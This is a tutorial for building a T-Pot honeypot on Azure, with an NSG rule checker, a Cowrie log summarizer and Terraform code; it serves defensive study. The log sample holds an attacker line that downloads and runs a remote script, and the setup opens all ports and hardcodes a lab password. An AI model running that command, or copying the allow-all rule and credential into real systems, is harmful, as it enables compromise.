30m Azure Honeypot Project
A honeypot is a fake computer system or network that looks real but isn’t actually used for any important work. It’s designed to attract hackers who are up to no good.
Just like a bee is drawn to honey, hackers are drawn to these honeypots because they seem like easy targets. Once they try to break in, cybersecurity experts can watch what the hackers are doing.
Think of it as a decoy house in a neighborhood. Burglars might try to break in, thinking it’s an easy target, but instead, they get caught in the act!
Almost all of the activity you’ll see in the honeypot is automated: bots scanning the internet nonstop, looking for vulnerable hosts. Within seconds of your host being exposed on the internet you will start seeing connection attempts from every direction.
That is what we’re doing here: we’re going to create a Debian VM on Azure, install T-Pot, and open the gates so that anyone and anything can reach it. Then I’m going to let you poke around and toy with all the features of T-Pot.
Creating a Virtual Machine
The first thing you’re going to do is go to the Azure Portal and sign up for an account if you don’t already have one. New accounts get $200 in free credits, which will more than cover the charges of this lab.
Once you have created an account, type “Virtual Machine” in the search bar at the top and you will be brought to the screen in Figure 1–1. Click the button to create a new virtual machine.
Then create a new resource group and name it “tpot-rg” as shown in Figure 1–2.
A resource is an individual service that you consume, and a resource group is a container that holds a set of related resources.
This project will have a few resources (the virtual machine, public IP address, network security group, etc.) inside this resource group. When you are finished with the lab, all you need to do is delete the resource group to delete the entire project.
- Name the virtual machine, “tpot-vm”
- Set the region to the region closest to you
- Set the security type to “standard”
- Click “See all images” and select “Debian 11 ‘Bullseye’ – x64 Gen 2”
- Choose size “Standard_B4ms — 4 vcpus, 16 GiB memory”
- Select password authentication type
- Choose username ‘azureuser’ and type a password
- Click “Next: Disks”
- Change the disk size to 128GiB
- Click “Next: Networking”
- Check the box to delete public IP and NIC when VM is deleted
- Click “Next: Management”
- Click “Review + create” at the top
- Click “Create” to create your new VM
- Wait for your VM deployment to finish
Open Traffic Flow
Now we need to open the gates: create a rule that allows all inbound traffic to the honeypot, so adversaries can reach it and you can collect the data.
- At the top search bar, type in “tpot-vm-nsg” and select the network security group resource
- Select “Inbound security rules” on the left
- Click “Add”
- Change Destination port ranges to “*”
- Leave Source as “Any” and Protocol as “Any”
- Change Priority to “100”
- Change Name to “DANGER_ALLOW_ALL”
- Click “Add”
This rule applies to every network interface or subnet the network security group is associated with, and it allows ALL inbound traffic on ALL ports, for ALL protocols, from ANY source. Azure evaluates rules from the lowest priority number upward and stops at the first match, so priority 100 wins over the built-in DenyAllInBound rule at 65500. This is not recommended anywhere at any time except right now, for a throwaway honeypot.
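To see exactly what that rule does, and to have a way of finding it again when the lab is over, here is an added example (not code from the article or from T-Pot) that evaluates Azure NSG inbound rules the way the platform does: lowest priority number first, first match wins, with the three built-in default inbound rules last. The two JSON samples are constructed to resemble the output of “az network nsg rule list -g tpot-rg --nsg-name tpot-vm-nsg -o json” (field names are assumed from the az CLI), and the service-tag resolution is a deliberate simplification that treats the lab VNet as 10.0.0.0/16 and everything outside RFC1918 as “Internet”.

```python
import ipaddress
import json
from dataclasses import dataclass

# Azure's built-in default inbound rules. Custom rules must use priority < 65000,
# so they are always evaluated before these.
DEFAULT_INBOUND = [
    ("AllowVnetInBound", 65000, "Allow", "*", "VirtualNetwork", "*"),
    ("AllowAzureLoadBalancerInBound", 65001, "Allow", "*", "AzureLoadBalancer", "*"),
    ("DenyAllInBound", 65500, "Deny", "*", "*", "*"),
]
# Simplified service-tag resolution (assumption, not Azure's real tag data):
# the lab VNet is 10.0.0.0/16 and anything outside RFC1918 counts as "Internet".
SERVICE_TAGS = {
    "VirtualNetwork": [ipaddress.ip_network("10.0.0.0/16")],
    "AzureLoadBalancer": [ipaddress.ip_network("168.63.129.16/32")],
}
PRIVATE = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample shaped like `az network nsg rule list ... -o json` (assumed field names)
LAB_NSG_JSON = """[
  {"name": "DANGER_ALLOW_ALL", "priority": 100, "direction": "Inbound", "access": "Allow",
   "protocol": "*", "sourceAddressPrefix": "*", "destinationPortRange": "*"},
  {"name": "AllowSSH", "priority": 150, "direction": "Inbound", "access": "Allow",
   "protocol": "Tcp", "sourceAddressPrefix": "Internet", "destinationPortRange": "22"}
]"""
# Constructed sample of what the NSG should look like once the lab is over
HARDENED_NSG_JSON = """[
  {"name": "AllowSSHFromMgmt", "priority": 100, "direction": "Inbound", "access": "Allow",
   "protocol": "Tcp", "sourceAddressPrefix": "198.51.100.0/24", "destinationPortRange": "22"}
]"""

@dataclass(frozen=True)
class Rule:
    name: str
    priority: int
    access: str      # "Allow" or "Deny"
    protocol: str    # "Tcp", "Udp", "Icmp" or "*"
    source: str      # CIDR, "*", a service tag, or a comma-separated mix
    dest_ports: str  # "*", "22", "80-443" or "22,80-443"

def rules_from_az_json(text):
    """Read inbound rules out of az CLI JSON (singular and plural field forms)."""
    rules = []
    for r in json.loads(text):
        if r.get("direction", "Inbound") != "Inbound":
            continue
        ports = r.get("destinationPortRange") or ",".join(r.get("destinationPortRanges", []))
        src = r.get("sourceAddressPrefix") or ",".join(r.get("sourceAddressPrefixes", []))
        rules.append(Rule(r["name"], int(r["priority"]), r["access"], r["protocol"], src, ports))
    return rules

def _port_matches(spec, port):
    for part in (p.strip() for p in spec.split(",")):
        if part == "*":
            return True
        lo, _, hi = part.partition("-")
        if int(lo) <= port <= int(hi or lo):
            return True
    return False

def _source_matches(spec, ip):
    addr = ipaddress.ip_address(ip)
    for part in (p.strip() for p in spec.split(",")):
        if part == "*":
            return True
        if part == "Internet":
            if not any(addr in net for net in PRIVATE):
                return True
        elif part in SERVICE_TAGS:
            if any(addr in net for net in SERVICE_TAGS[part]):
                return True
        else:
            try:
                if addr in ipaddress.ip_network(part, strict=False):
                    return True
            except ValueError:
                continue  # a service tag this toy resolver does not know about
    return False

def evaluate(rules, src_ip, dst_port, protocol):
    """Azure semantics: lowest priority number first, first match wins, defaults last."""
    candidates = list(rules) + [Rule(*d) for d in DEFAULT_INBOUND]
    for r in sorted(candidates, key=lambda x: x.priority):
        if r.protocol != "*" and r.protocol.lower() != protocol.lower():
            continue
        if _source_matches(r.source, src_ip) and _port_matches(r.dest_ports, dst_port):
            return r.access, r.name
    return "Deny", "DenyAllInBound"  # not reachable: DenyAllInBound matches everything

def overpermissive(rules):
    """Names of Allow rules that expose every port to the whole internet."""
    wide = {"*", "Internet", "0.0.0.0/0"}
    return [r.name for r in rules
            if r.access == "Allow" and r.dest_ports.strip() == "*"
            and any(p.strip() in wide for p in r.source.split(","))]
```

With the lab rules loaded, evaluate(rules, "203.0.113.5", 23, "Tcp") returns ("Allow", "DANGER_ALLOW_ALL") and overpermissive(rules) lists that rule; with the hardened rules the same packet falls through to ("Deny", "DenyAllInBound") while a VNet-internal source is still allowed by AllowVnetInBound. Pipe real az output into rules_from_az_json to run the same check against your own subscription before you forget the rule exists.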
Configuring the honeypot
Now we need to grab the public IP address of the VM, as it’s time to log in.
- Type “tpot-vm” in the search bar at the top and select the resource
- Copy the Public IP address to the clipboard
Windows 10 and 11 ship an SSH client you can use from the command prompt, and macOS and Linux have one in the terminal. Go ahead and SSH into the host:
ssh azureuser@<public ip address>
- Execute these commands
sudo apt update
sudo apt upgrade -y
sudo apt install git
sudo git clone https://github.com/telekom-security/tpotce
cd tpotce/iso/installer/
sudo ./install.sh --type=user
- Select the “Standard” edition
- When asked for a web user, enter “azureuser” and the same password you used before (this is the login for the T-Pot web interface, separate from the Linux account)
The installer reboots the VM when it finishes. After the reboot T-Pot owns the standard ports, so SSH moves to port 64295 (ssh -p 64295 azureuser@<public ip address>) and you can open the T-Pot landing page from your browser via:
https://<your VM's public IP address>:64297
Note that the installer path above is the one for T-Pot 22.04; later releases moved to a single install.sh in the repository root, so check the README of the version you clone.
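Once traffic starts arriving, the Kibana dashboards on the landing page are the obvious place to look, but the raw honeypot logs are worth poking at too. The following is an added example (not code from the article or from T-Pot) that reads the JSON-lines log written by Cowrie, the SSH/Telnet honeypot in the Standard edition, and summarizes who connected, which credentials they tried, and what they ran after logging in. The file location /data/cowrie/log/cowrie.json is assumed from the T-Pot 22.04 layout, and the sample events embedded below are constructed, not captured.

```python
import json
from collections import Counter

# Constructed sample events in Cowrie's JSON-lines format (not real captures).
SAMPLE_COWRIE_JSON = "\n".join([
    '{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","src_port":51514,"dst_port":22,"session":"a1","timestamp":"2024-03-01T10:00:00.000000Z"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"123456","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-03-01T10:00:01.000000Z"}',
    '{"eventid":"cowrie.login.failed","username":"admin","password":"admin","src_ip":"203.0.113.10","session":"a1","timestamp":"2024-03-01T10:00:02.000000Z"}',
    '{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","src_port":40022,"dst_port":22,"session":"b2","timestamp":"2024-03-01T10:05:00.000000Z"}',
    '{"eventid":"cowrie.login.success","username":"root","password":"123456","src_ip":"198.51.100.23","session":"b2","timestamp":"2024-03-01T10:05:01.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"uname -a","src_ip":"198.51.100.23","session":"b2","timestamp":"2024-03-01T10:05:02.000000Z"}',
    '{"eventid":"cowrie.command.input","input":"wget http://203.0.113.77/x.sh; sh x.sh","src_ip":"198.51.100.23","session":"b2","timestamp":"2024-03-01T10:05:03.000000Z"}',
    '{"eventid":"cowrie.session.closed","src_ip":"198.51.100.23","session":"b2","duration":12.3,"timestamp":"2024-03-01T10:05:12.000000Z"}',
    'this line is not json and should be skipped',
])

def parse_events(text):
    """One JSON object per line; skip anything that is not valid JSON."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # rotated or partially written lines happen on a busy honeypot
    return events

def summarize(events):
    """Who connected, which credentials they tried, and what they ran after logging in."""
    connects = [e for e in events if e["eventid"] == "cowrie.session.connect"]
    logins = [e for e in events if e["eventid"] in ("cowrie.login.failed", "cowrie.login.success")]
    commands = {}
    for e in events:
        if e["eventid"] == "cowrie.command.input":
            commands.setdefault(e["session"], []).append(e["input"])
    # Anything the attacker tried to fetch is usually the most interesting artifact
    urls = {tok for cmds in commands.values() for cmd in cmds
            for tok in cmd.replace(";", " ").replace("|", " ").split()
            if tok.startswith(("http://", "https://"))}
    return {
        "sessions": len({e["session"] for e in connects}),
        "top_sources": Counter(e["src_ip"] for e in connects).most_common(5),
        "top_credentials": Counter((e["username"], e["password"]) for e in logins).most_common(5),
        "successful_logins": sum(1 for e in logins if e["eventid"] == "cowrie.login.success"),
        "commands_by_session": commands,
        "download_urls": sorted(urls),
    }

def summarize_file(path="/data/cowrie/log/cowrie.json"):
    """Path assumed from the T-Pot 22.04 layout; run as root or via sudo on the VM."""
    with open(path, encoding="utf-8") as fh:
        return summarize(parse_events(fh.read()))

if __name__ == "__main__":
    import sys
    report = summarize_file(sys.argv[1]) if len(sys.argv) > 1 else summarize(parse_events(SAMPLE_COWRIE_JSON))
    print(json.dumps(report, indent=2))
```

Run it with no arguments to see the report for the constructed sample, or pass the path to the live cowrie.json on the VM. On the sample it reports two sessions, root/123456 as the most-tried credential pair, one successful login, and http://203.0.113.77/x.sh as the payload the attacker tried to pull down.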
NOW! Delete everything and deploy it again with Terraform. I’ve written this Terraform to show you exactly how much easier it is. Earlier in this course you set up Azure with Terraform.
If you don’t remember, create a new directory called “tfpot” and change directory into it. Inside it, create a new file called “tfpot.tf” and paste in this code:
terraform {
  required_providers {
    azurerm = {
      source  = "hashicorp/azurerm"
      version = "3.90.0"
    }
  }
}

provider "azurerm" {
  # The azurerm 3.x provider requires the features block, even when it is empty
  features {}
}

variable "prefix" {
  default = "tpot"
}

resource "azurerm_resource_group" "tpot-rg" {
  name     = "${var.prefix}-resources"
  location = "East US" # change to the region closest to you
}

resource "azurerm_virtual_network" "main" {
  name                = "${var.prefix}-network"
  address_space       = ["10.0.0.0/16"]
  location            = azurerm_resource_group.tpot-rg.location
  resource_group_name = azurerm_resource_group.tpot-rg.name
}

resource "azurerm_subnet" "internal" {
  name                 = "internal"
  resource_group_name  = azurerm_resource_group.tpot-rg.name
  virtual_network_name = azurerm_virtual_network.main.name
  address_prefixes     = ["10.0.2.0/24"]
}

resource "azurerm_virtual_machine" "main" {
  name                  = "${var.prefix}-vm"
  location              = azurerm_resource_group.tpot-rg.location
  resource_group_name   = azurerm_resource_group.tpot-rg.name
  network_interface_ids = [azurerm_network_interface.tpot-vm-nic.id]
  vm_size               = "Standard_B4ms"

  # Delete the OS disk and any data disks together with the VM so that
  # "terraform destroy" leaves nothing behind
  delete_os_disk_on_termination    = true
  delete_data_disks_on_termination = true

  storage_image_reference {
    publisher = "debian"
    offer     = "debian-11"
    sku       = "11"
    version   = "latest"
  }

  storage_os_disk {
    name              = "tpot-disk"
    caching           = "ReadWrite"
    create_option     = "FromImage"
    managed_disk_type = "Standard_LRS"
    disk_size_gb      = 128 # same 128 GiB as the manual install; T-Pot needs the space
  }

  os_profile {
    computer_name  = "${var.prefix}-vm"
    admin_username = "azureuser"
    # Throwaway lab password. Anywhere else, pass this in as a sensitive variable
    # (or use SSH keys) instead of committing it to source control.
    admin_password = "CloudSecurityNOW!"
  }

  os_profile_linux_config {
    disable_password_authentication = false
  }
}

# Network security group for the honeypot VM
resource "azurerm_network_security_group" "tpot-nsg" {
  name                = "linux-vm-nsg"
  location            = azurerm_resource_group.tpot-rg.location
  resource_group_name = azurerm_resource_group.tpot-rg.name

  # Same DANGER_ALLOW_ALL rule as the manual section: every protocol (not just
  # TCP, since T-Pot also runs UDP and ICMP honeypots), every port, from the
  # whole internet. Only acceptable for a throwaway honeypot.
  security_rule {
    name                       = "AllowALL"
    description                = "Allow all inbound traffic to the honeypot"
    priority                   = 100
    direction                  = "Inbound"
    access                     = "Allow"
    protocol                   = "*"
    source_port_range          = "*"
    destination_port_range     = "*"
    source_address_prefix      = "Internet"
    destination_address_prefix = "*"
  }

  # Redundant while AllowALL exists; keeps SSH reachable if you later remove it.
  # Note that T-Pot moves SSH to port 64295 after it is installed.
  security_rule {
    name                       = "AllowSSH"
    description                = "Allow SSH"
    priority                   = 150
    direction                  = "Inbound"
    access                     = "Allow"
    protocol                   = "Tcp"
    source_port_range          = "*"
    destination_port_range     = "22"
    source_address_prefix      = "Internet"
    destination_address_prefix = "*"
  }
}

# Associate the NSG with the subnet
resource "azurerm_subnet_network_security_group_association" "tpot-vm-nsg-association" {
  subnet_id                 = azurerm_subnet.internal.id
  network_security_group_id = azurerm_network_security_group.tpot-nsg.id
}

# Get a static public IP
resource "azurerm_public_ip" "tpot-vm-ip" {
  name                = "tpot-vm-ip"
  location            = azurerm_resource_group.tpot-rg.location
  resource_group_name = azurerm_resource_group.tpot-rg.name
  allocation_method   = "Static"
}

# Create the network interface for the VM
resource "azurerm_network_interface" "tpot-vm-nic" {
  name                = "tpot-vm-nic"
  location            = azurerm_resource_group.tpot-rg.location
  resource_group_name = azurerm_resource_group.tpot-rg.name

  ip_configuration {
    name                          = "internal"
    subnet_id                     = azurerm_subnet.internal.id
    private_ip_address_allocation = "Dynamic"
    public_ip_address_id          = azurerm_public_ip.tpot-vm-ip.id
  }
}

output "public_ip" {
  value = azurerm_public_ip.tpot-vm-ip.ip_address
}
Run az login to establish your Azure credentials
az login
Initialize the directory
terraform init
Now terraform plan
terraform plan
Now terraform apply
terraform apply
It will output the public IP address. SSH into it (port 22 until T-Pot is installed) with the credentials:
Username: azureuser
Password: CloudSecurityNOW!
And install the honeypot
sudo apt update
sudo apt upgrade -y
sudo apt install git
sudo git clone https://github.com/telekom-security/tpotce
cd tpotce/iso/installer/
sudo ./install.sh --type=user
Have fun! When you are finished, make sure you run “terraform destroy”, and also delete the resource group left over from the manual install in Azure.
Tyler Wall is the founder of Cyber NOW Education by night and works full time in the cybersecurity industry as his day job. He creates cybersecurity training material in his free time, often after feeling the need to shout what he’s just learned and also because a little bit of passive income never hurt anyone.
He holds a Master of Science from Purdue University, as well as CISSP, CCSK, CFSR, CEH, Sec+, Net+ and A+ certifications.
You can connect with him on LinkedIn.
Get 20% off all courses in our On-Demand catalog with coupon code “MEDIUMFRIENDS”
For a limited time, get a free copy of the Jump-start Your SOC Analyst Career eBook, published June 1, 2024, in exchange for a review on Amazon. Email tyler@cybernoweducation.com